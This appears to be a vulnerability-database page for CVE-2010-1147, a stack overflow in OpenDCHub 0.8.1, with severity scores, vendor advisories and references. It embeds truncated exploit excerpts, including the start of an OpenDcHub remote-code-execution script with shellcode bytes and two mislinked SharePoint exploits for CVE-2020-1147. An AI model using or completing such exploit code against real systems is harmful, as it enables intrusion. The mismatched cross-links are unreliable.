CVE-2010-1147
published 2010-04-06CVE-2010-1147: Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0.8.1 allows remote authenticated users to execute arbitrary code via a…
PriorityP341medium6CVSS 2.0
AVNACMAuSCPIPAP
EXPLOIT
EPSS
8.17%
94.2th percentile
Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0.8.1 allows remote authenticated users to execute arbitrary code via a long MyINFO message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| roshan_singh | open_direct_connect_hub | — | — |
CVSS provenance
nvdv2.06.0MEDIUMAV:N/AC:M/Au:S/C:P/I:P/A:P
vendor_redhat6.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
vendor_redhat·2010-03-31·CVSS 6.0
CVE-2010-1147 [MEDIUM] v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
v0.8.1: Stack overflow by handling a specially-crafted MyINFO message
Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0.8.1 allows remote authenticated users to execute arbitrary code via a long MyINFO message.
GHSA
GHSA-rx3v-5h5h-c62c: Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0
ghsa_unreviewed·2022-05-02
CVE-2010-1147 [MEDIUM] CWE-119 GHSA-rx3v-5h5h-c62c: Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0
Stack-based buffer overflow in Open Direct Connect Hub (aka Open DC Hub or OpenDCHub) 0.8.1 allows remote authenticated users to execute arbitrary code via a long MyINFO message.
No detection rules found.
Exploit-DB
Microsoft SharePoint Server 2019 - Remote Code Execution (2)
exploitdb·2021-07-23·CVSS 7.8
CVE-2020-1147 [HIGH] Microsoft SharePoint Server 2019 - Remote Code Execution (2)
Microsoft SharePoint Server 2019 - Remote Code Execution (2)
---
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from
Exploit-DB
Microsoft SharePoint Server 2019 - Remote Code Execution
exploitdb·2020-08-17·CVSS 7.8
CVE-2020-1147 [HIGH] Microsoft SharePoint Server 2019 - Remote Code Execution
Microsoft SharePoint Server 2019 - Remote Code Execution
---
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests
Exploit-DB
OpenDcHub 0.8.1 - Remote Code Execution
exploitdb·2010-03-31
CVE-2010-1147 OpenDcHub 0.8.1 - Remote Code Execution
OpenDcHub 0.8.1 - Remote Code Execution
---
#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
# OpenDcHub is a direct connect hub for Linux
#
# OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
# OpenDcHub 0.8.1
#
# Plateforms :
# Unix
#
# Usage :
# ./exploit.py
import socket
host = '192.168.1.9'
port = 5000
# must not contain \x36 \x53 \x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="\x33\xc9\xb1\x13\xba\xf6\x1d\xe7\xfa\xdb\xde\xd9\x74\x24"
shellcode+="\xf4\x5e\x83\xc6\x04\x31\x56\x0a\x03\xa0\x17\x05\x0f\x7d"
shellcode+="\xf3\x3e\x13\x2e\x40\x92\xbe\xd2\xcf\xf5\x8f\xb4\x02\x75"
shellcode+="\xb4\x66\xf5\xb6\xe3\x97\x
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308http://lists.fedoraproject.org/pipermail/package-announce/2010-April/040360.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-April/040380.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-April/040421.htmlhttp://marc.info/?l=oss-security&m=127051570728944&w=2http://openwall.com/lists/oss-security/2010/04/03/1http://secunia.com/advisories/39664http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600http://www.securityfocus.com/archive/1/510428http://www.securityfocus.com/bid/39129http://www.vupen.com/english/advisories/2010/1023http://www.vupen.com/english/advisories/2010/1044https://bugzilla.redhat.com/show_bug.cgi?id=579206http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576308http://lists.fedoraproject.org/pipermail/package-announce/2010-April/040360.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-April/040380.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-April/040421.htmlhttp://marc.info/?l=oss-security&m=127051570728944&w=2http://openwall.com/lists/oss-security/2010/04/03/1http://secunia.com/advisories/39664http://www.indahax.com/exploits/opendchub-0-8-1-remote-code-execution-exploit#more-600http://www.securityfocus.com/archive/1/510428http://www.securityfocus.com/bid/39129http://www.vupen.com/english/advisories/2010/1023http://www.vupen.com/english/advisories/2010/1044https://bugzilla.redhat.com/show_bug.cgi?id=579206
2010-04-06
Published